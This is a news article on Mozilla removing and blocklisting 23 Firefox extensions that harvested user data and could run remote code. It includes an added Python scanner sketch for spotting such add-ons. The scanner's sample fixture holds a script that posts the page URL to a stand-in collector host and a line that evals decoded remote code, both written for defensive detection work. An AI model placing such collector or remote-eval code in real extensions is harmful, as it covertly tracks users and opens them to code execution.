by Martin Brinkmann on August 17, 2018 in Firefox – Last Update: August 18, 2018 – 11 comments
Mozilla purged 23 Firefox extensions today, both from the official Firefox Add-ons website (Mozilla AMO) and from the browsers they were installed in.
The ban affects 23 Firefox extensions that were installed by more than 500,000 users of the browser. The list includes the infamous Web Security extension, which Mozilla had highlighted as a “great” privacy extension in a blog post on its official site before quietly deleting every reference to it without noting the change in the post.
Web Security had 220,000 users at that time; other banned extensions include Facebook Video Downloader, Popup-Blocker, Simply Search, Auto Destroy Cookies, and Google NoTrack.
A bug report on the official Bugzilla bug tracking site that Mozilla maintains lists all extension IDs that are affected.
Mozilla Engineer Rob Wu analyzed the Web Security extension after it hit the news. He made the decision to search for Web Security patterns in all publicly available Firefox extensions and found extensions that used similar snooping code. In fact, all extensions were found to send data to the same server that Web Security connected to.
All extensions collected user data and sent the data to remote servers according to Mozilla.
Wu reported his findings to Mozilla, which added the IDs of the extensions to the blocklist the organization maintains and removed the add-ons from the Mozilla website.
Extensions that land on the blocklist are automatically disabled if they are installed in Firefox and are no longer usable. Firefox’s Add-ons blocklist is a public list that anyone can access.
The blocklist has three entries for August 16 and one of them is for Web Security and other add-ons.
Web Security and others — Sending user data to remote servers unnecessarily, and potential for remote code execution. Suspicious account activity for multiple accounts on AMO.
Mozilla published an explanation on Bugzilla of why it decided to block the extensions in Firefox:
- The extensions sent more data to remote servers than seemed necessary.
- Some of the data is sent across insecure connections.
- The data collecting and sending is not made clear or disclosed clearly apart from being revealed in a large privacy policy.
- The potential to execute code remotely is built into the extensions, and partial obfuscation is used to make identification more complicated.
- Same code exists in multiple add-ons that have different features and different authors. It appears that the same developer or group is behind all these extensions.
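The cross-add-on sweep Rob Wu ran is described above only in outline; the following is an added Python sketch of that kind of defender-side check, not Mozilla's tooling. It looks for the traits named in the list (plaintext http endpoints, a dynamic-code hook, and byte-identical scripts shared by add-ons under different names) in XPI packages; the add-on ids, URL and scripts are constructed for the example.

```python
import hashlib
import io
import re
import zipfile

# Indicators drawn from the traits Mozilla listed: plaintext http endpoints,
# dynamic code execution (a remote-code hook) and identical code across add-ons.
URL_RE = re.compile(r"https?://[^\s'\"]+")
DYNAMIC_CODE_RE = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")

def scan_xpi(data: bytes) -> dict:
    """Static scan of one XPI (a zip archive); hashes each script for cross-add-on matching."""
    out = {"insecure_urls": [], "dynamic_code": [], "script_hashes": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in (n for n in z.namelist() if n.endswith(".js")):
            src = z.read(name).decode("utf-8", "replace")
            out["script_hashes"][name] = hashlib.sha256(src.encode()).hexdigest()[:16]
            out["insecure_urls"] += [u for u in URL_RE.findall(src) if u.startswith("http://")]
            if DYNAMIC_CODE_RE.search(src):
                out["dynamic_code"].append(name)
    return out

def shared_scripts(reports: dict) -> dict:
    """Map script digest -> add-on ids that ship a byte-identical script."""
    seen = {}
    for addon_id, rep in reports.items():
        for digest in rep["script_hashes"].values():
            seen.setdefault(digest, []).append(addon_id)
    return {d: ids for d, ids in seen.items() if len(ids) > 1}

def build_xpi(files: dict) -> bytes:
    """Pack {filename: content} into an in-memory XPI for the constructed sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in files.items():
            z.writestr(name, content)
    return buf.getvalue()

# Constructed sample: two add-ons that ship the same collector script; ids, URL and code are invented.
COLLECTOR = "fetch('http://collector.example.invalid/log', {method: 'POST', body: location.href});\n"
SAMPLE_ADDONS = {
    "addon-a@example.invalid": build_xpi(
        {"collect.js": COLLECTOR, "bg.js": "eval(atob(remoteBlob));\n"}),
    "addon-b@example.invalid": build_xpi({"collect.js": COLLECTOR}),
}

def scan_all(addons: dict = SAMPLE_ADDONS) -> tuple:
    """Scan every package and report which scripts are shared between them."""
    reports = {aid: scan_xpi(xpi) for aid, xpi in addons.items()}
    return reports, shared_scripts(reports)
```

Against a real corpus the same two functions run over downloaded XPI files; a shared digest across add-ons with unrelated features is the signal that pointed to one author behind the 23 extensions.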
Closing Words
Removal of extensions from Mozilla AMO and use of the blocklist feature to get them disabled in Firefox installations was the right move by Mozilla.
One has to ask, however, why these extensions were not blocked from being listed in the first place. Mozilla changed the review process for Firefox WebExtensions in 2017 from manual (human) reviews to automatic (computer) reviews. Human reviews are still a thing on Mozilla AMO, but extensions can land in the Store as soon as they pass the automatic review.
While that decreases the time it takes to publish new extensions and extension updates, it also increases the chance that malicious, privacy-invasive, or otherwise problematic extensions land in the Store.
Mozilla had to step in several times in the past already, for instance when several crypto mining extensions were unleashed. The system is not nearly as bad as Google’s for Chrome extensions, but it is far from being perfectly safe. (via Bleeping Computer)
Now You: What is your take on this?